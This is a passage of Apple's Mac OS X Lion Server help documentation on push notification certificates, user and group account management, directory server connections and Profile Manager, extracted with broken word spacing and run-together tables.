Pus h notification provides increased server res pons iveness to clients and reduced s erver load. What is it? Pus h notification lets a server notify a user of changes (a new email, or an event change), without the user reques ting an update. A service (like iCal or mail) maintains a simple connection with the client, and the s ervice informs the client that theres new data. This differs from previous methods (polling or pull notification), where calendar and mail applications contacted the server at regular intervals reques ting data. Using the polling method of notification, the server must attend to each reques t, no matter whether the us er has new data waiting. With the push method of client updating, only users with new data are contacted, and only as needed. For best server performance, use pus h notification. It makes your s erver more respons ive and reduces s erver workload. Lion Server push notification cannot host thrid-party iOS apps push notifications . Lion Server push notification does provide push notification for mail, calendar, and Addres s Book services hosted on Lion Server and accessed using Apple's iOS clients (Mail, Calendar, Contacts). What uses it? Pus h notification is available for the following s ervices : Addres s Book service iCal service Mail service Pus h notification service must be running the s ame OS version as every s ervice us ing it, even if the services arent running on the same server. Clients must s upport pus h notification to make use of it. Apples client applications on Mac OS X v10.6 and iOS 5.0 client applications support push notification service. Third-party client applications may support it. To make a secure connection between the server and the clients, you need a transport encryption certificate installed on the server and ready for use. Apple provides a transport encryption certificate when you provide an Apple ID and password in the pus h notification s ettings.
RELATED TOPICS
Start pus h notification s ervice Change a push certificates Apple ID Revoke push notification connection permiss ion Renew a push notification certificate Pus h notification certificate
Push Notification
Push notification certificate

To secure pus h notifications, s upply your organizations Apple ID and password. Do not use a personal Apple ID as sociated (for example, one thats already as sociated with iTunes or Apples Developer Center). Before enabling push notification To enable secure pus h notifications , you need an encryption certificate. Apple can issue a certificate to someone with a known identity, s uch as an Apple ID. The Server app uses this certificate signed by Apple to encrypt pus h notifications from the server to any client that needs a notification.
Item Apple ID Description This is the user name registered with Apple. Use an Apple ID associated with your organization, and not a personal Apple ID. Example my_business@example.com
Password
This is the password associated with the Apple ID, not the administrator password for the server.
jCvuZvRMIvTTY1
Acquire Certificate Create one now.
Click to continue enabling push notifications. Click to open Safari to a webpage for creating or retrieving an Apple ID.
After enabling push notification Once you enable push notification, you can change the Apple ID as sociated with the certificate, renew the certificate, or revoke the certificate.
Item Apple ID Description This is the user name registered with Apple. Action Click Change to reissue a certificate under a different Apple ID. Expires The certificate is good until the listed date. You must renew the certificate to avoid interrupted service. Manage your certificates This is a link to the Apple Push Certificates Portal. Click Renew to reissue a certificate with the same Apple ID, but with an extended expiration date. You revoke compromised certificates using the portal. Click the phrase to open the correct URL in Safari.
RELATED TOPICS
About push notification Start pus h notification s ervice Change a push certificates Apple ID Revoke push notification connection permiss ion Renew a push notification certificate
Push Notification
Revoke push notification connection permission

To forcibly disable push notifications, you revoke the connection's encryption certificate. After you revoke the certificate, your server can no longer send pus h notifications . If the private key portion of your certificate is compromised, revoke the certificate. A compromis ed certificate cant ensure authenticity, integrity, or privacy of push notifications. This means users cant trust that push notifications came from your server, werent tampered with in transit, and havent been seen surreptitious ly. The private key is a file and can be compromised by theft of the server, the dis k its stored on, or its backup media. The private key can als o be compromis ed by anyone who has access to your s erver.
1. Log in to the Apple Push Certificates Portal. Sign in with the Apple ID you us ed to reques t the certificate. 2. In the Mac OS X Server Certificates section, locate the certificate for the des ired server. 3. Click Revoke in the Actions column, and confirm the action. 4. When you finish, sign out.
RELATED TOPICS
About push notification Start pus h notification s ervice Change a push certificates Apple ID Renew a push notification certificate Pus h notification certificate
Push Notification
Start push notification service

You enable push notification using the Server app. When you enable pus h notification, you must supply an Apple ID ass ociated with your organization. Using a personal Apple ID isnt recommended. You must have, or be ready to create, an Apple ID before you can turn on the service.
1. Select the server in the Hardware s ection of the Server app sidebar. 2. Select Enable Apple push notifications . 3. Enter the Apple ID and password. If you dont have an Apple ID for your organization, follow the link to create one. 4. Click Get certificate.
RELATED TOPICS
About push notification Change a push certificates Apple ID Revoke push notification connection permiss ion Renew a push notification certificate Pus h notification certificate
Push Notification
Renew a push notification certificate

You mus t periodically renew certificates used to provide encrypted notification. Renewing a certificate creates a new certificate with a new expiration date.
1. Select the server in the Hardware s ection of the Server app sidebar. 2. Next to Enable Apple push notifications, click Edit 3. Next to the expiration date, click Renew. 4. Supply the Apple ID and pass word. 5. Click Renew certificate.
RELATED TOPICS
About push notification Start pus h notification s ervice Change a push certificates Apple ID Revoke push notification connection permiss ion Pus h notification certificate
Push Notification
Change a push certificates Apple ID

If you previously enabled pus h notification and acquired a certificate from Apple, you can change the Apple ID as sociated with the certificate. WARNING: Changing your Apple ID replaces the exis ting certificate and disrupts notifications to registered devices . Users must reregister their Macs and iOS devices with the Apple Push Notification Service.
1. Select the server in the Hardware s ection of the Server app sidebar.
2. Next to Enable Apple push notifications, click Edit. 3. Next to the Apple ID, click Change. A warning states that changing the Apple ID dis rupts existing push notifications until us ers reregis ter their devices with the service. 4. Read the warning and click Continue. 5. Supply the Apple ID and pass word. 6. Click Renew certificate.
RELATED TOPICS
About push notification Start pus h notification s ervice Revoke push notification connection permiss ion Renew a push notification certificate Pus h notification certificate
Lion Serv er user management
Manage users and groups
About tools for client management

You can manage client accounts using the Server app, the Profile Manager website, and Workgroup Manager. Ideally, you create and manage accounts in the Server app, and configure and manage preferences and application settings in the Profile Manager webs ite. In the Us ers and Groups panes of the Server app, you can configure ess ential us er and group account settings. In the service panes of the Server app, you can configure and turn on services for these users and groups. In the Profile Manager website, you can create configuration profiles, which configure preferences , install certificates, and change application s ettings. You access the Profile Manager website by clicking links in the Profile Manager pane of the Server app. You can deploy configuration profiles over a network, or distribute them using email or the web. You can use configuration profiles to manage computers , and mobile devices such as iPhone, iPod touch, or iPad. Workgroup Manager is an app you can us e to configure user and group account settings and manage preferences. You cant configure or turn on services for users and groups. You can manage computers but you cant manage mobile devices. For more information about Workgroup Manager, see User Management for Mac OS X Server v10.6 at s upport.apple.com/manuals /.
RELATED TOPICS
About user accounts About configuration profiles
About accounts
About administrator accounts

You need an administrator account on your server to create user accounts , create groups, change s erver s ettings, and perform other tasks using the Server app. With an administrator account, you can als o make changes to locked preferences in System Preferences, ins tall software on the server, and perform other tas ks that standard users cant. Initially, your server has a primary administrator account but no other administrator accounts . If you enable a network account server (also known as a directory server) on the server, your s erver will have a primary administrator account and a directory administrator account. Primary administrator account The s erver always has a primary administrator account, whos e name and pass word you entered while s etting up the server. The primary adminis trator account is s tored in the s ervers local directory with user accounts you create in the Us ers & Groups pane of Sys tem Preferences. You can us e this adminis trator account on the server, and you can use it to manage your s erver over the network from another Mac. Directory administrator account
By default, Mac OS X Lion includes a local directory, but doesnt enable a network account server, which manages network accounts . In the Server app, you can enable a network account server. If your server has a network account server, the s erver also has a directory administrator account. This account has the password you entered during setup, but its name is Directory Administrator and its short name is diradmin. If you migrated to Mac OS X Lion from Mac OS X Server v10.6, the name and short name of the directory administrator account is migrated over. The directory adminis trator account is stored in the network account server, along with user accounts you create in the Users pane of the Server app. If a malfunction makes the primary adminis trator account unusable, you can use the server's directory administrator account to authenticate in the Server app and manage the server locally or remotely. By default, the directory administrator account isnt shown in the Users pane of the Server app. You can view the directory administrator and all other administrator and sys tem accounts by choos ing View > Show System Accounts . Primary and directory administrator accounts compared The following table compares the primary administrator account and the directory administrator account.
Feature Name and short name Stored in the servers local directory Stored in the servers network account server Can be used from an administrator computer Primary administrator Specified during setup Yes No Yes Directory administrator Directory administrator and diradmin No Yes Yes
Administrators on an upgraded server If your server was previously upgraded or migrated from a standard or workgroup configuration of Mac OS X Server v10.5 Leopard, you have different administrator accounts. Your primary administrator account is in your servers directory. This is a directory administrator account, and it has the name and short name s pecified during Leopard Server setup. You also have an administrator account s tored on your server, and it has the name Local Adminis trator and short name localadmin. For more information about these accounts, s ee Getting Started for Mac OS X Server v10.5. Its available on the Apple Manuals website at support.apple.com/manuals/. Administrator account security To keep your s erver secure: Dont s hare an adminis trator name or pass word with anyone. Log out when you leave your server, or set up a locked s creen saver using the Security pane of System Preferences . If you leave your server while youre logged in and the screen is unlocked, someone could make changes us ing your administrator privileges. Turn off Automatic login in the Users & Groups pane, under Login Options of System Preferences . If the server logs in as an administrator, someone can res tart the server to gain access as an administrator. For added security, routinely log in on the server using a s tandard us er account. Us e your administrator name and password when you open the Server app or another application that requires administrator privileges .
RELATED TOPICS
View system and administrator accounts About user accounts
About accounts
About user accounts

User accounts on your server let users gain access to s ervices provided by the server. A user account contains the information needed to prove the users identity for services that require authentication. A user account also provides a centralized place to store a users contact information and other data. You can add user accounts in the Users pane of the Server app by: Creating accounts
Importing existing accounts, if your organization has a network account server (also known as a directory s erver) that your server is connected to Importing from a file You can import us er accounts individually. You can also automatically import all user accounts that are members of a group. The Us ers pane of the Server app lists local us er accounts (including us er accounts created in System Preferences), network accounts s tored in your servers network account s erver, and imported user accounts. Local user accounts Users with administrator privileges on their Macs can create local us er accounts using the Us ers & Groups pane of System Preferences. These local user accounts are stored on the users computer. Local us er accounts have home folders on the computer and can be used to log in to the computer. Users cant use their computers local user accounts to access the server over the network. Users can us e the s erver's local user accounts to access the server over the network. Like us ers Macs, your server has local accounts in addition to server accounts and, possibly, imported accounts. Your servers local accounts can be used to log in to the server, and a local account with adminis trator privileges can be used to administer the server. For information about administrator privileges, see About administrator accounts. Network accounts Network accounts are s tored in your s ervers network account s erver or in a connected network account server. You can use Server app or Server Admin to enable a network account server on your server. If you dont enable the network account server, then all accounts you create on the server are stored in the s ervers local directory. Accounts stored in the servers local directory can be used to authenticate to services hos ted by the server but they cant be us ed to log in. Imported user accounts Imported user accounts remain in your organizations network account s erver. Imported user accounts can access your servers services. You can let imported users adminis ter your server, or be a member of groups stored on your server. When someone uses an imported user account, your server combines the account information stored in the network account server with additional privileges given by your s erver. Types of user accounts compared Your server can have its own network accounts or us e accounts from an existing network server. You can als o import accounts, which stores a s ynced copy of the network account from another network s erver on your network s erver. Heres a comparison of the four types of accounts:
Feature Local accounts Netw ork accounts on your serv er Where the account is stored: Local directory Local network server Netw ork accounts from an existing netw ork serv er Another network server Another network server, synced to local network server Who creates this: A user with an administrator account on the computer using System Preferences, or using the Server app if the servers network account server is disabled, or Workgroup Manager Membership in network groups: System Preferences support: Allows editing (including changing the password), local group membership Local access to servers services: Remote access to servers services: Access to group shared folders: Full access Full access Full access Full access Full access Full access Wiki only Full access Full access Full access Wiki only Full access Can change password Can change password Can change password Allowed Allowed Allowed Allowed You (a server administrator), using the Server app or Workgroup Manager T he network account servers administrator The network account servers administrator Imported accounts
Home folder on server:
Yes
Yes
No
No
RELATED TOPICS
About adminis trator accounts Create a user account Import users from another network account s erver Import users and groups from a file
Work w ith users
Import users and groups from a file

You can import us ers and groups from XML or character-delimited text files, which is an eas y way to quickly set up accounts. You can us e Workgroup Manager or the dsexport command-line tool to create XML or character-delimited text files of accounts in your network s erver. For more information about Workgroup Manager, see User Management for Mac OS X Server v10.6 at support.apple.com/manuals/. For information about how to use dsexport, enter man dsexport in Terminal. You assign passwords to us ers after importing, becaus e pas swords arent included in import files.
1. If your s erver is not s et up to host network accounts , set it up to do s o. When you're viewing the Server app, if the Manage > Manage Network Accounts option is listed, your s erver is not set up to host network accounts. For information about setting up your server to host network accounts, see Host network accounts. 2. In the Server app, choos e Manage > Import Accounts from File. 3. Select the file to import and then click Open.
RELATED TOPICS
Use advanced tools for more s ervices Host network accounts Reset a us ers password Change a us ers account s ettings Create a user account Create groups
Work w ith users
Delete a user account

You can us e the Server app to delete us er accounts that are no longer needed. Deleting a user account cancels its group members hips and stops its access to group services and private wikis. Deleting a user account also deletes the users mail stored on the s erver. A deleted user account can no longer access calendars and address book information on the s erver. Deleting a user account doesnt remove the us ers backup data. If the Time Machine preferences on the deleted users computer were set to use the server for backup storage, the us ers backup data remains in /Shared Items /Backups / on the backup disk specified in the Time Machine pane of the Server app.
1. In the Users pane of the Server app, select the user account to delete. 2. Click the Delete button ().
RELATED TOPIC
Create a user account
Work w ith users
Change a users account settings

You can change a users name, picture, adminis trator privileges, and groups the user is in. You can also edit advanced us er s ettings s uch the user ID, the group the us er belongs in, the users short name, other s hort names for the user (als o known as aliases ), the login shell, and the home folder. Thes e advanced settings are set when you create or import the user account. Be careful when changing thes e s ettings, because invalid s ettings can prevent the user from logging in. Change basic user account settings 1. In the Users pane of the Server app, double-click a user account. The users account information is shown. 2. Do the following:
To do this Change the users name Do this In the Full Name field, enter the users name. The name can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces. Choose whether the user is a server administrator Choose where the user's home folder is located Select or deselect Allow user to administer this server. Choose a folder from the Home Folder pop-up menu. The Home Folder pop-up menu appears if your server has file sharing turned on and at least one share point enables home folders. Add the user to a group Click Add (+) and then enter the name of a group in the servers directory. The name autocompletes as you type. Select a group name to add the user to the group. If the name doesnt autocomplete, make sure you spelled the group name correctly. You can add users to groups on your server, but you cant add users to groups in directory domains youre connected to. Remove a user from a group Select a group and then click Remove (). All user accounts on your server are included in the Workgroup group. Dont remove users from this group. Change the users picture Click the silhouette or the existing user picture and select a standard picture, or click Edit Picture for a customized picture. When you click Edit Picture, you can take a picture with your computers camera or choose a graphic file on your computer. After taking or choosing a picture, you can drag the picture to pan it or use the slider to zoom it. When you finish customizing the picture, click Set.
3. Click Done to s ave your changes to the us er account. Change advanced user account settings 1. In the Users pane of the Server app, Control-click a user account and choose Advanced Options. The following s ettings are available:
Setting User ID Group Description This numerical ID is used for folder and file permissions. This is the UNIX group the user belongs to. Typically, this should be the "staff" group. Account Name Aliases This is the user's account name. These are other account names the user can use to log in.
Login Shell Home Directory
This is the user's UNIX shell. By default, this is /bin/bash. This is the location of the user's home folder.
2. If you change s ettings, click OK.
RELATED TOPICS
Reset a us ers password Enable s hared home folders Control a users access to services Change a us ers or groups name Change a us ers or groups picture Create a user account Import users from another network account s erver
Work w ith users
Choose a users home folder location

When you give a user a home folder on your server, the us er can log in to their computer using the account information stored on the server. Because the users home folder is on the s erver, files they save are stored on the server.
1. If you havent done s o, s et up your server to hos t network accounts. For information, see Host network accounts . 2. Enable a shared home folder if you havent done so. For information, see Enable shared home directory folders. 3. In the Users pane of the Server app, double-click a user account. 4. Choose a folder from the Home Folder pop-up menu and then click Done. If the Home Folder pop-up menu does nt appear, you dont have a shared home folder enabled. If you choose Local Only, the user wont have a home folder on the server and cant log in using the account information stored on the s erver.
Work w ith users
Control a users access to services

Use the Server app to control users access to services. You can restrict users access to services listed in the Server app except Web and Wiki services. Web and Wiki s ervices have more cus tomizable acces s control. For webs ites , you can limit access on a per-s ite level. For example, if your server is hosting two webs ites , www.example1.com and www.example2.com, you can give users acces s to www.example1.com but not to www.example2.com. Wikis have their own acces s controls, so you can restrict whos allowed to create wikis . When you create a wiki, you can designate others as adminis trators. Wiki administrators can choose who has access to the wiki and whether they can read and write or just read wiki content.
1. In the Server app, click Us ers. 2. Control-click the user and choose Edit Acces s to Services . 3. In the dialog that appears, s elect the checkboxes for services you want the user to access, then click OK.
RELATED TOPICS
Publish a website
Choose group s ervices
Work w ith users
Reset a users password

In the Server app, you can reset the passwords of us er accounts in your servers directory domain, but you cant reset the pas swords of imported user accounts . A user can use System Preferences to change his or her password.
1. In the Users pane of the Server app, control-click a user and then choose Reset Pass word. 2. Enter the users new password in the New Pas sword and Verify fields and then click Change Password. You can use Pas sword Ass is tant to help you choose a pass word. Click the button next to the New Pass word field to see how secure the pas sword is. The user can change this pas sword in the Us ers & Groups pane of System Preferences on the us ers computer.
RELATED TOPICS
Change a us ers account s ettings Set the global pas sword policy
Work w ith users
Set the global password policy

In the Server app, you can set a global password policy that's applied to all non-admin users. Changes take effect the next time users log in. There are two types of policies: disabling login when specific conditions are met, and password restrictions. The s erver enforces password policies for us ers . For example, a users pass word policy can specify a pas sword expiration interval. If the user tries to log in and the s erver determines that the users pass word has expired, the user must replace the expired pass word, and then the user can log in. Pas sword policies can disable a us er account on a specified date, after a number of days, after a period of inactivity, or after a number of failed login attempts. Pas sword policies can also require pas swords to be a minimum length, contain at least one letter, contain at least one numeral, differ from the account name, differ from recent pass words, or be changed periodically. Pas sword policies dont affect administrator accounts. Adminis trators are exempt from password policies, because they can change these policies, and because enforcing pass word policies on adminis trators could s ubject them to denial-of-service attacks.
1. In the Users pane of the Server app, choose Edit Global Pas sword Policy from the Action pop-up menu. 2. Select the options to enable and then click OK.
RELATED TOPIC
Reset a us ers password
Work w ith users
Wipe or lock user devices

If a user has a managed device, you can issue a remote wipe or lock command, and for iOS devices, res et their pass code. You can als o use Profile Manager to remotely wipe or lock devices and to configure them.
1. In the Users pane of the Server app, double-click a user account. 2. Click Wipe or Lock next to a device.
If no devices are listed, the user doesnt have managed devices .
RELATED TOPIC
About configuration profiles
Work w ith users
Host network accounts

You can host network accounts on your server, which gives users remote acces s to your servers services. If you dont host network accounts on your s erver, accounts you create on your s erver are local accounts. When you host network accounts on your server, you can create network accounts in the Server app, or create local accounts in System Preferences. Other s ervers can import network accounts hosted on your server. When another server imports an account from your s erver, a user with an imported account can use services from other servers but still us e the user name and pass word stored on your server. Accounts you create in Server app prior to s etting it up to host network accounts are local accounts. The following icons appear at the right of a user's or group's portrait to indicate whether the account is a local, network, or imported account:
Graphic (none) Description Local account Network account
Imported account
Hosting network accounts on your server is als o known as setting up an Open Directory master.
1. In the Server app, choos e Manage > Manage Network Accounts. If Manage Network Accounts isnt listed, your server hosts network accounts. 2. In the ass istant that appears, click Next. 3. In the Directory Administrator step, enter a name and pass word for the directory administrator account, then click Next. The directory administrator account can manage the network server, server services, and adminis ter the computer. Choose a strong password. 4. In the Organization Information step, enter the name of your organization and a valid email address, then click Next. The information you provide is us ed to s et up the certificate server. 5. In the Confirm Settings step, make s ure the information you enter is correct, and then click Set Up.
RELATED TOPICS
About user accounts Create a user account Import users from another network account s erver Import a group from another network account s erver
Work w ith groups
Create groups
You can create groups with the Server app.
1. In the Groups pane of the Server app, click the Add button (+).
2. In the Full Name field, enter the group name. The name can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces . 3. In the Group Name field, enter the groups s hort name. If you dont want to use the generated short name, enter a different short name. After the account is created, you cant change the short name. The short name typically is eight or fewer characters, but can be up to 255 Roman characters. Use only the characters a through z, A through Z, 0 through 9, . (period), _ (underscore), or - (hyphen). 4. To associate a picture with the group account, click the s ilhouette and select a s tandard picture, or click Edit Picture for a customized picture. When you click Edit Picture, you can take a picture with your computers camera or choos e a graphic file on your computer. After taking or choos ing a picture, you can drag the picture to pan it or use the slider to zoom it. When you finish customizing the picture, click Set. 5. Click Done to create the group account.
RELATED TOPICS
Choose group s ervices Add or remove group members Change a us ers or groups name Change a us ers or groups picture Delete a group
Work w ith groups
Delete a group
You can us e the Server app to delete group accounts that are no longer needed.
1. In the Groups pane of the Server app, select a group. 2. Click the Delete button ().
RELATED TOPIC
Create groups
Work w ith groups
Add or remove group members

In the Server app, you can create groups compos ed of users with accounts on your s ervers network account s erver (also known as a directory server), your servers local directory, or your organizations directory. If your server is connected to a network account s erver, your group members can include users and groups from the network account server. External members dont have user accounts on your server and cant access your s ervers services except for wiki service. They can acces s the groups shared folder and the wikis the group has permiss ion to view. Add a group member 1. In the Groups pane of the Server app, double-click a group name, or select a group and click Edit (pencil). The groups account information is s hown. 2. Click Add (+) and then enter a user name or group name. The name autocompletes as you type. If the name doesnt autocomplete, make sure you spelled the name correctly. This looks up local and network account namesincluding those in the external network account server, if your server is connected to one.
3. Select a user name to add the us er to the group. 4. Click Done to s ave your changes to the group account. Add several group members 1. In the Groups pane of the Server app, double-click a group name, or select a group and click Edit (pencil). The groups account information is s hown. 2. Click Add (+) and enter a us er name. 3. Select Brows e in the list that appears. A window listing all local and network us ers and groups appears. The lis t also includes us ers and groups in the external network account server, if your server is connected to one. If there are too many accounts to list in the window, you wont see accounts until you search for them. 4. Drag us ers and groups from the window to the Members list. To s elect a range of users and groups , hold down the Shift key while selecting users and groups. To select or des elect them, hold down the Command key while clicking. 5. Click Done to s ave changes to the group account. Remove a group member 1. In the Groups pane of the Server app, double-click a group name or s elect a group and click Edit (pencil). The groups account information is s hown. 2. Select a group member and click Remove (). 3. Click Done to s ave changes to the group account.
RELATED TOPICS
Change a us ers group membership Change a us ers or groups name Change a us ers or groups picture Choose group s ervices Create groups
Work w ith groups
Change a users group membership

Its eas y to change which groups a us er belongs to. By default, users belong to the Workgroup group. Don't remove users from this group, becaus e you need a group that all users belong to.
1. In the Users pane of the Server app, double-click a user. 2. Do any of the following: To add a group, click the Add button (+) and then enter the name of the group. The name autocompletes as you type. If the name doesnt autocomplete, make sure you spelled the groups name correctly. This looks up local and network account names, including in the external network account server (als o known as a directory server), if your server is connected to one. To remove a group, select the group and then click Remove ().
RELATED TOPICS
Add or remove group members Change a us ers account s ettings
Work w ith groups
Change a users or groups name

You can change an accounts full name, but you cant change its short name. Names can be up to 255 characters (or as few as 85 Japanese characters), and can include spaces.
1. Do one of the following: To change a users name, in the Users pane of the Server app, double-click a user. To change a groups name, in the Users pane of the Server app, double-click a group. 2. Edit the Full Name field and then click Done.
RELATED TOPICS
Change a us ers account s ettings Change a us ers or groups picture Reset a us ers password Choose group s ervices
Work w ith groups
Change a users or groups picture

You can change the picture for users and groups . You cant change the picture for an imported account if the network account server (also known as a directory server) has a picture set for the account.
1. Do one of the following: To change a users picture, in the Users pane of the Server app, double-click a us er. To change a groups picture, in the Groups pane of the Server app, double-click a group. 2. Do one of the following: To use an included picture, click the picture area and choose a picture from the pop-up menu. To use a picture from your computer, find the picture in Finder and drag the picture to the picture area. 3. To edit the picture, do any of the following:
To do this Replace the picture with a picture youve used recently. Replace the picture with a picture from your computer. T ake a picture using a video camera attached to your computer. Move the picture. Crop the picture. Apply a visual effect. Do this Click Recent Pictures, then click a picture. Click Choose. Click the camera button. Drag it up, down, or sideways. Drag the slider. Click the Visual Effects button (swirl), scroll through the available effects, and select the effect you want.
RELATED TOPICS
Change a us ers or groups name Change a us ers account s ettings Choose group s ervices
Work w ith groups
Choose group services

You can enable group s ervices that create a shared folder for the group, make group members iChat buddies, and create a wiki for the group. Shared folders are stored in /Groups/groupname/ on the server. Users can acces s them by connecting to afp://servername/Groups/groupname/. If your server runs iChat s ervice, users have Jabber-bas ed iChat accounts and you can make group members iChat buddies.
1. In the Groups pane of the Server app, double-click a group name, or select a group and click Edit (pencil). The groups account information is s hown. 2. Enable or dis able the following s ervices :
Option Give this group a shared folder. Description Select this option to create a shared folder for the group in /Groups/ groupname / on the server. When group members log in, they can access this folder by connecting to afp:// servername /Groups/ groupname / in the Finder, and then upload files to it. Make group members iChat buddies. Select this option to include group members as iChat buddies. When group members open iChat, the server is included as an iChat server, and group members are included in the list. Create Group Wiki. Click this button to create a private wiki for the group. Group members can create and edit content in the wiki.
3. Click Done to s ave your changes .
RELATED TOPICS
Add or remove group members Control a users access to services Make all group members iChat buddies Set up a group file s haring folder
Work w ith groups
Make all group members iChat buddies

You can automatically make all members of a group iChat buddies . When group members open iChat, the server is included as an iChat server, and group members are included in the list.
1. In the Groups pane of the Server app, double-click a group. 2. Select Make group members iChat buddies.
RELATED TOPIC
Choose group s ervices
Work w ith groups
Set up a group file sharing folder

You can set up a group file sharing folder. All members of the group have full access to the folder, including uploading, downloading, and deleting files.
Shared folders are stored in /Groups/groupname/ on the server.
1. In the Groups pane of the Server app, double-click a group. 2. Select Give this group a shared folder and then click Done. After the s hared folder is created, you can click the arrow button next to the option to view the contents of the s hared folder.
RELATED TOPICS
Add or remove group members Choose group s ervices Control a users access to services Make all group members iChat buddies
Work w ith other netw ork account serv ers
Connect to another network account server

You can connect your server to a network account server (also known as a directory s erver), which gives us ers on the network account server access to wiki service and group shared folders . Your server can connect to a Mac Open Directory server that has Mac OS X Lion Server or Mac OS X v10.6 Snow Leopard Server. If it has Snow Leopard Server, it must have v10.6.8 or later to authenticate users for your servers podcas t service and wiki service. Your server can also connect to a Windows Active Directory server or to a third-party LDAP server. If your s erver connects to an LDAP s erver, you might need to us e the Directory Utility app to change your servers LDAP server mappings. If your server is connected to a network account s erver, groups on your s erver can include users and groups from the network account server. People with us er accounts on other network account servers dont have us er accounts on your s erver and cant access your servers services except for wiki service. They can acces s the groups shared folder and wikis that the group has permission to view. If you import an account from another network account s erver, the imported account can acces s your servers services. You can also make an imported user be an adminis trator for your server, be a member of groups in your s erver, or have a home folder on your server.
1. In the Server app, choos e Manage > Connect to Directory. If your s erver is n't set up to host network accounts, the "Configure Network Users and Groups" assistant appears. After you complete this as sistant, the "Connect to Directory" ass is tant appears . For information about setting up your s erver to host network accounts , see Host network accounts . 2. Proceed through the assistant that appears, then when the as sistant asks you to enter the server address of the directory server that has the accounts to import, enter it and click Next. 3. If the dialog expands to show fields for Client Computer ID, User Name, and Password, enter the name and pas sword of a us er account on the directory server. For an Open Directory server, you can enter the name and pass word of a s tandard us er account; you dont need to use a directory administrator account. Depending on the network account s erver settings, you might be able to connect without authentication by leaving thes e fields blank, although this is less secure. For an Active Directory s erver, you can enter the name and pass word of an Active Directory administrator account or a standard user account that has the Add workstations to domain privilege. 4. In the Confirm Settings step, make s ure all settings are correct and then click Set Up. When you connect to another network server, the Manage menu no longer lists Connect to Directory. When you create users or groups, you can now import accounts. Connect to your first network account server using the Server app, and connect to additional network account s ervers using System Preferences. You can also disconnect from network account servers using System Preferences . For information about joining network account s ervers in Sys tem Preferences, see System Preferences Help.
RELATED TOPICS
Import users from another network account s erver Import a group from another network account s erver
Import users from another network account server

If your server connects to your organizations network account s erver, you can import users exis ting accounts. Imported user accounts remain in your organizations network account s erver. Imported users have access to all services on your server. Accounts that arent imported cant access those s ervices , except for wiki service. You can also import groups, which imports all members of the group.
1. If your s erver is not s et up to host network accounts , set it up to do s o. When you're viewing the Server app, if the Manage > Manage Network Accounts option is listed, your s erver is not set up to host network accounts. For information about setting up your server to host network accounts, see Host network accounts. 2. In the Users pane of the Server app, click the Add button (+). A New Us er dialog appears . 3. From the Type pop-up menu, choose Imported user from directory. If you dont see the Type pop-up menu, your server is nt connected to a network account server in your organization. For information on connecting to a network account s erver, s ee Connect to another network account server. If your organization doesnt have a network account s erver (other than your server), you cant import us ers but you can create us er accounts. 4. Type part or all of the us ers name in the s earch field; then, when you see the name, select it and click Import. 5. When you finish importing user accounts, click Done.
Imported user accounts have a blue arrow

RELATED TOPICS
in the lower-right corner of their user picture in the Users pane.
Connect to another network account s erver About user accounts Import a group from another network account s erver
Import a group from another network account server

If your server connects to your organizations network account s erver (als o known as a directory server), you can import group accounts , which imports all group members user accounts . Imported accounts can use all services on the server. External accounts that arent imported can only use wiki service. Imported group accounts are s ynced. If people are added to or removed from the imported group on your organizations network account server, their imported user accounts gain or los e access s ervices on the s erver. You can add group members to the group but you cant remove group members who you didnt add.
1. If your s erver is not s et up to host network accounts , set it up to do s o. When you're viewing the Server app, if the Manage > Manage Network Accounts option is listed, your s erver is not set up to host network accounts. For information about setting up your server to host network accounts, see Host network accounts. 2. In the Groups pane of the Server app, click the Add button (+). The New Group dialog appears. 3. From the Type pop-up menu, choose Imported group from directory. If you dont see the Type pop-up menu, your server is nt connected to a network account server in your organization.
If your organization doesnt have a network account s erver (other than your server), you cant import groups but you can create group accounts. 4. Type part or all of the group name in the search field; then, when you see the name, s elect it and click Import. 5. When you finish importing user accounts, click Done.
Imported group accounts have a blue arrow

RELATED TOPICS
in the lower-right corner of their group picture in the Groups pane.
Connect to another network account s erver About user accounts Import users from another network account s erver
View accounts in the Serv er app
Sort the list of users or groups

Its eas y to sort the lis t of users or groups by name, account name, or ID. Name refers to the users or groups full name, and account name refers to the us ers or groups short name. The ID is ass igned to users and groups when theyre created. Recently created accounts typically have higher IDs than older accounts.
In the Us ers or Groups pane of the Server app, Control-click a us er or group, choose Arrange By, and then choose an option.
RELATED TOPIC
Change a us ers account s ettings
View accounts in the Serv er app
View system and administrator accounts

By default, the Users pane of the Server app lis ts all user accounts and the primary administrator account, but it doesnt list system accounts , the root account, and the directory administrator account. These accounts arent lis ted because you shouldnt edit them, nor should you use them to log in on client computers.
In the Server app, choose View > Show Sys tem Accounts. If youre already showing sys tem accounts, hide them by choos ing View > Hide Sys tem Accounts.
RELATED TOPIC
About adminis trator accounts
Profile Manager
About Profile Manager

Profile Manager makes it easy to configure your us er's Mac OS X Lion computers and iOS devices so they're set up to use your company or school resources and s o they have the settings your organization requires . Components of Profile Manager Profile Manager consists of three parts that work together to let you s pecify how clients are configured, how to administer devices, and how to deliver the configurations to users and devices. Web-bas ed Administration Tool The Profile Manager web app is where you configure settings for devices, manage enrolled devices and device groups, and execute or monitor tasks on enrolled devices.
Self-Service User Portal Profile Manager's user portal is an easy to us e, s ecure website for distributing settings you define using the administration tool. Users connect to the web-based portal us ing their device then. Then, after they log in, the s ettings that you as signed to them are available for download and installation. Us ers also utilize this site to enroll devices for mobile device management, if you're us ing Profile Manager as a mobile device management server. Mobile Device Management Server Profile Manager also provides a device management (MDM) server that lets you remotely manage enrolled Mac OS X Lion and iOS devices. After a device is enrolled with Profile Manager, you can update its configuration over the network without user interaction, as well as execute tasks s uch as reporting or locking and wiping the device. Understanding user and device groups Each user, user group, device, and device group can have a default group of s ettings . This allows you to eas ily s hare bas e settings for devices or people that need them. For example, to configure a teacher's iPad, create a us er account for the teacher then place that user in the "teachers " and "iPad" groups. This assigns them two collections of default s ettingsone from each groupand you can then create ass ign additional settings that are tailored to the user. Other types of user and device groups that you might find useful are "lab Mac," "field sales iPhone," and "student notebooks." For the latter group, for example, the default s ettings might include restrictions or specific network settings. Understanding configuration profiles Behind the s cenes, Profile Manager works by creating and distributing configuration profiles . Configuration profiles are XML files (.mobileconfig) that contain payloads that define groups of settings . When the profile is ins talled on a Mac OS X Lion or iOS device, the settings it defines are applied. Each user, device, and group have default configuration profiles so you can quickly provide a base level of settings, then you can further ass ign additional configuration profiles to customize the s ettings to meet your organizational requirements . For example, to enforce restrictions and configure user's devices to us e your VPN, create a configuration profile with a restrictions payload and a VPN payload. Becaus e both payloads are in the same profile, the user must ins tall both. If they remove the configuration profile to 